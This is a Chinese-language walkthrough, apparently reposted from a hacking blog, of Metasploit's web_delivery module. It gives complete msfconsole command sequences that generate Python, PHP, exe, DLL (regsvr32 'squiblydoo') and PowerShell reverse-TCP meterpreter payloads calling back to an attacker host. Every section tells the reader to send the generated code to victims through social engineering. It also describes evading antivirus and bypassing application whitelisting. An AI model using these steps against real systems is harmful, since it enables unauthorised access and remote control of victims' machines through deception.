命令注入利用:通过 Web 传输方式(Linux、Windows)

快速下载

大家好!在本文中,您将学习如何使用 Metasploit 框架的单一漏洞利用程序来利用三个不同的平台(Linux、Windows)。

在 Kali Linux 中打开终端并输入“ msfconsole ”以加载 Metasploit 框架并执行下面的漏洞利用。

该模块会快速启动一个提供有效载荷的 Web 服务器。提供的命令允许有效载荷下载并执行。它可以使用指定的脚本语言解释器或通过 regsvr32.exe 执行“squiblydoo”来绕过应用程序白名单。该模块的主要目的是在攻击者需要手动输入命令时,在目标计算机上快速建立会话:例如命令注入、RDP 会话、本地访问或远程命令执行。此攻击向量不会写入磁盘,因此不太可能触发杀毒软件,并且允许 Meterpreter 提供的权限提升。使用任一 PSH 目标时,请确保有效载荷架构与目标计算机匹配,或使用 SYSWOW64 powershell.exe 在 x64 计算机上执行 x86 有效载荷。Regsvr32 使用“squiblydoo”技术绕过应用程序白名单。经过签名的 Microsoft 二进制文件 Regsvr32 能够请求 .sct 文件,然后执行其中包含的 PowerShell 命令。两个 Web 请求(即 .sct 文件和 PowerShell 下载/执行)可以发生在同一端口上。“PSH(二进制)”会将文件写入磁盘,从而允许下载/执行自定义二进制文件。

要求

攻击者:Kali Linux

目标平台:Window、PHP、Linux [ubuntu]

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>show targets

从下图中您可以观察到有 5 个目标,它们可以帮助您生成恶意代码以在受害者系统中创建后门。

利用Linux平台[python]

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 0
msf exploit (web_delivery)>set payload python/meterpreter/reverse_tcp
msf exploit (web_delivery)>run

在这个漏洞中,我们设置了目标 0 来为 python 平台生成恶意代码,从下面给出的图像中您可以观察到突出显示的恶意 python 代码,现在复制它并使用社会工程方法发送给受害者。

一旦受害者在终端执行恶意代码,攻击者就会获得 meterpreter 会话作为受害者系统的未经授权的访问。

利用Linux平台[PHP]

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)>run

现在我们已经设置了目标 1 来为 php 平台生成恶意代码,从下面给出的图像中您可以观察到突出显示的恶意 php 代码,现在复制它并使用社会工程方法发送给受害者。

一旦受害者在 Web 浏览器中执行恶意代码,攻击者就会获得另一个 meterpreter 会话作为对受害者系统的未经授权的访问。

利用Windows平台[exe]

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 2
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run

此外,我们设置了目标 2 来为 Windows 平台生成恶意代码,从下图中您可以观察到突出显示的恶意 powershell.exe,现在复制它并使用社会工程方法发送给受害者。

一旦受害者在命令提示符中执行恶意代码,攻击者就会获得 meterpreter 会话作为对受害者系统的未经授权的访问。

利用Windows平台[DLL]

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run

在这个漏洞中,我们设置了目标 3 来为窗口平台生成恶意代码,从下面给出的图像中您可以观察到突出显示的恶意 dll 代码,现在复制它并使用社会工程方法发送给受害者。

一旦受害者在 RUN 窗口内将恶意代码作为运行命令执行,攻击者将再次获得 meterpreter 会话并在受害者系统中进行未经授权的访问。

利用 Windows 平台 [Powershell 二进制文件]

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 4
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run

在这个漏洞中,我们设置了目标 4 来为 Windows 平台生成恶意代码,从下面给出的图像中您可以观察到突出显示的恶意powershell.exe 二进制代码,现在复制它并使用社会工程方法发送给受害者。

一旦受害者在命令提示符中执行恶意代码,攻击者就会获得 meterpreter 会话作为对受害者系统的未经授权的访问。

因此,单一漏洞“Web 传送脚本”对于破解三个不同的平台非常有帮助。

解压密码:123